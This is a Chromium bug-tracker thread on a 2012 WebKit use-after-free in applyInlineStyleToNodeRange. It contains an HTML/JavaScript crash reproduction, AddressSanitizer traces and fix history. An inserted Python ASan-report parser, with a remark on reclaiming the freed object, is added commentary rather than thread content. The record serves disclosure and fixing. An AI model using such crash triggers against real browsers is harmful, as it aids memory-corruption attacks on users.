Status: Fixed
Closed: Mar 2012
OS: All
Pri: 1
Type: Bug-Security
Heap-use-after-free in WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange
Reported by miau...@gmail.com, Mar 22 2012


VULNERABILITY DETAILS
use-after-free in WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange

VERSION
Chrome Version: stable, beta, dev

Chromium	19.0.1078.0 (Developer Build 128192)
OS	Linux
WebKit	536.4 (@111590)

Operating System: 64bit linux

REPRODUCTION CASE
<html>
  <head>
    <script>
      onload = function() {
        x.innerHTML += ''
      }
      setTimeout(function() {
        document.designMode='on'
        document.execCommand('selectall')
        document.execCommand('bold')
      }, 0)
    </script>
  </head>
  <body>
    <div id="x">
      <iframe src="data:"></iframe>
      <div>
        <input></input>
      </div>
    </div>
  </body>
</html>

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: renderer + asan
Crash State: 

==3487== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffc6b489c0 at pc 0x55555a8b5c80 bp 0x7fffffff9490 sp 0x7fffffff9488
READ of size 8 at 0x7fffc6b489c0 thread T0
    #0 0x55555a8b5c80 in WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange(WebCore::EditingStyle*, WebCore::Node*, WebCore::Node*) ???:0
    #1 0x55555a8b44cb in WebCore::ApplyStyleCommand::fixRangeAndApplyInlineStyle(WebCore::EditingStyle*, WebCore::Position const&, 

0x7fffc6b489c0 is located 64 bytes inside of 104-byte region [0x7fffc6b48980,0x7fffc6b489e8)
freed by thread T0 here:
    #0 0x55555de4d932 in operator delete(void*) ??:0
    #1 0x55555a8b5a5a in WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange(WebCore::EditingStyle*, WebCore::Node*, WebCore::Node*) ???:0
    #2 0x55555a8b44cb in WebCore::ApplyStyleCommand::fixRangeAndApplyInlineStyle(WebCore::EditingStyle*, WebCore::Position const&, WebCore::Position const&) ???:0

64104.txt (10.8 KB)
64104.html (408 bytes)
beta-64104.txt (10.9 KB)
stable-64104.txt (11.0 KB)
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecImpacts-Stable SecSeverity-High Stability-AddressSanitizer OS-All Mstone-17
Owner: infe...@chromium.org
Status: Assigned
Summary: Use-after-free in WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange (was: NULL)
Status: Started
webkit upstream - https://bugs.webkit.org/show_bug.cgi?id=81959
Cc: rniwa@chromium.org
Summary: Heap-use-after-free in WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange (was: NULL)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=29322300

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7faac8486bc0
Crash State:
  - crash stack -
  WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange
  WebCore::ApplyStyleCommand::fixRangeAndApplyInlineStyle
  - free stack -
  WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange
  WebCore::ApplyStyleCommand::fixRangeAndApplyInlineStyle
  

Minimized Testcase (0.32 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv94THgDdzgBmEY372A3m9xB3RhOGTy84hvmAqqBdMQRqL5XCG-FhintY_fvlXnByETeRMLYc3egV8KXuh3d4S2FOQbrfjsBQbFXs3249l7JujShbG-03ngVceSmki2qF19xI9snSZ1DiCfGTOIQGJ22U4gI1kA
<script>
  onload = function() {
    x.innerHTML += ''
  }
  setTimeout(function() {
    document.designMode='on'
    document.execCommand('selectall')
    document.execCommand('bold')
  }, 0)
</script>
<div id="x">
  <iframe src="data:"></iframe>
  <div>
    <input></input>
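The thread shows the same crash in two forms: the raw AddressSanitizer output in the report above, and the ClusterFuzz "Crash State" summary (crash type with access kind and size, faulting address, and the top frames of the crash stack and the free stack, with the `operator delete` frame dropped). The following is an added example, not ClusterFuzz's or Chromium's code, of how such a summary is derived from a raw report. The sample report is constructed from the frames quoted in this bug, with the truncated crash-stack frame #1 completed from the identical free-stack frame; the list of allocator and interceptor frames to skip is an assumption (ClusterFuzz's real ignore-list is longer), and the parser also accepts the later `AddressSanitizer: <type> on address` header format.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample input: the AddressSanitizer report quoted in this bug, with the
# truncated crash-stack frame #1 completed from the identical free-stack frame.
ASAN_REPORT = """\
==3487== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffc6b489c0 at pc 0x55555a8b5c80 bp 0x7fffffff9490 sp 0x7fffffff9488
READ of size 8 at 0x7fffc6b489c0 thread T0
    #0 0x55555a8b5c80 in WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange(WebCore::EditingStyle*, WebCore::Node*, WebCore::Node*) ???:0
    #1 0x55555a8b44cb in WebCore::ApplyStyleCommand::fixRangeAndApplyInlineStyle(WebCore::EditingStyle*, WebCore::Position const&, WebCore::Position const&) ???:0
0x7fffc6b489c0 is located 64 bytes inside of 104-byte region [0x7fffc6b48980,0x7fffc6b489e8)
freed by thread T0 here:
    #0 0x55555de4d932 in operator delete(void*) ??:0
    #1 0x55555a8b5a5a in WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange(WebCore::EditingStyle*, WebCore::Node*, WebCore::Node*) ???:0
    #2 0x55555a8b44cb in WebCore::ApplyStyleCommand::fixRangeAndApplyInlineStyle(WebCore::EditingStyle*, WebCore::Position const&, WebCore::Position const&) ???:0
"""


@dataclass
class Frame:
    index: int
    pc: int
    function: str   # full symbol including its parameter list, as ASan printed it
    location: str   # file:line, or ???:0 / ??:0 when there is no debug info

    @property
    def name(self) -> str:
        """Symbol without its parameter list, the form shown under 'Crash State'."""
        return self.function.split("(", 1)[0].strip()


@dataclass
class AsanReport:
    bug_type: str                        # e.g. heap-use-after-free
    address: int                         # faulting address
    access: Optional[str] = None         # READ / WRITE
    access_size: Optional[int] = None
    region_offset: Optional[int] = None  # offset of the access inside the freed region
    region_size: Optional[int] = None    # size of the freed region (the heap size class)
    stacks: Dict[str, List[Frame]] = field(default_factory=dict)  # crash / free / alloc


# Old reports say "AddressSanitizer heap-use-after-free", newer ones "AddressSanitizer: ...".
_HEADER = re.compile(r"ERROR: AddressSanitizer:? (\S+) on (?:unknown )?address (0x[0-9a-f]+)")
_ACCESS = re.compile(r"^(READ|WRITE) of size (\d+) at 0x[0-9a-f]+ thread")
_FRAME = re.compile(r"^#(\d+)\s+(0x[0-9a-f]+)\s+in\s+(.*)\s+(\S+)$")
_REGION = re.compile(r"is located (\d+) bytes (?:inside|to the right|to the left) of (\d+)-byte region")
_SECTIONS = (
    (re.compile(r"^(READ|WRITE) of size"), "crash"),
    (re.compile(r"^freed by thread"), "free"),
    (re.compile(r"^previously allocated by thread"), "alloc"),
)
# Frames that carry no information about the bug: allocator entry points and sanitizer
# interceptors. Assumption: ClusterFuzz's real ignore-list is longer than this.
_NOISE = re.compile(r"^(operator (new|delete)|malloc|free|realloc|calloc|__asan_|__interceptor_)")


def parse_asan_report(text: str) -> AsanReport:
    """Parse one ASan error report into its header fields and per-section stacks."""
    report: Optional[AsanReport] = None
    section: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if report is None:
            m = _HEADER.search(line)
            if m:
                report = AsanReport(bug_type=m.group(1), address=int(m.group(2), 16))
            continue
        m = _ACCESS.match(line)
        if m:
            report.access, report.access_size = m.group(1), int(m.group(2))
        m = _REGION.search(line)
        if m:
            report.region_offset, report.region_size = int(m.group(1)), int(m.group(2))
        for pat, name in _SECTIONS:
            if pat.match(line):
                section = name
                report.stacks.setdefault(name, [])
                break
        m = _FRAME.match(line)
        if m and section is not None:
            report.stacks[section].append(
                Frame(int(m.group(1)), int(m.group(2), 16), m.group(3), m.group(4)))
    if report is None:
        raise ValueError("no AddressSanitizer error header found")
    return report


def crash_state(report: AsanReport, depth: int = 3) -> Dict[str, List[str]]:
    """The first `depth` non-noise function names of each stack, ClusterFuzz style."""
    return {name: [f.name for f in frames if not _NOISE.match(f.name)][:depth]
            for name, frames in report.stacks.items()}


def format_report(report: AsanReport, depth: int = 3) -> str:
    """Render the summary in the layout used by the ClusterFuzz comment in this bug."""
    access = f" {report.access} {report.access_size}" if report.access else ""
    lines = [f"Crash Type: {report.bug_type.capitalize()}{access}",
             f"Crash Address: 0x{report.address:x}"]
    if report.region_size is not None:
        lines.append(f"Region: access at offset {report.region_offset} "
                     f"of a {report.region_size}-byte freed region")
    lines.append("Crash State:")
    for name, frames in crash_state(report, depth).items():
        lines.append(f"  - {name} stack -")
        lines.extend(f"  {fn}" for fn in frames)
    return "\n".join(lines)


if __name__ == "__main__":
    print(format_report(parse_asan_report(ASAN_REPORT)))
```

The region line is worth keeping in the summary even though ClusterFuzz's state omits it: an 8-byte READ at offset 64 of a freed 104-byte object is a pointer-sized load from a size class an attacker can try to reclaim, which is the kind of detail that distinguishes a triage-only crash from one that justifies the SecSeverity-High label applied to this bug.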
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/112012
Labels: reward-topanel
Project Member Comment 7 by ClusterFuzz, Mar 26 2012
ClusterFuzz has detected this issue as fixed in range 128813:128890.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=29322300

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7faac8486bc0
Crash State:
  - crash stack -
  WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange
  WebCore::ApplyStyleCommand::fixRangeAndApplyInlineStyle
  - free stack -
  WebCore::ApplyStyleCommand::applyInlineStyleToNodeRange
  WebCore::ApplyStyleCommand::fixRangeAndApplyInlineStyle
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=128813:128890

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv94THgDdzgBmEY372A3m9xB3RhOGTy84hvmAqqBdMQRqL5XCG-FhintY_fvlXnByETeRMLYc3egV8KXuh3d4S2FOQbrfjsBQbFXs3249l7JujShbG-03ngVceSmki2qF19xI9snSZ1DiCfGTOIQGJ22U4gI1kA

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Labels: -Mstone-17 -Merge-Approved Mstone-18 Merge-Merged
M18: http://trac.webkit.org/changeset/112630
Labels: -reward-topanel reward-1000 reward-unpaid CVE-2011-3075
$1000 and all that
Labels: -reward-unpaid
Comment 11 by cdn@chromium.org, May 15 2012
Status: Fixed
Marking old security bugs Fixed.
Project Member Comment 12 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 13 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-WebKit -SecImpacts-Stable -SecSeverity-High -Stability-AddressSanitizer -Mstone-18 Cr-Content Security-Impact-Stable M-18 Security-Severity-High Type-Bug-Security Performance-Memory-AddressSanitizer
Project Member Comment 14 by bugdroid1@chromium.org, Mar 13 2013
Labels: Restrict-View-EditIssue
Project Member Comment 15 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member Comment 17 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-High Security_Severity-High
Project Member Comment 18 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 19 by bugdroid1@chromium.org, Apr 1 2013
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member Comment 20 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 21 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 22 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic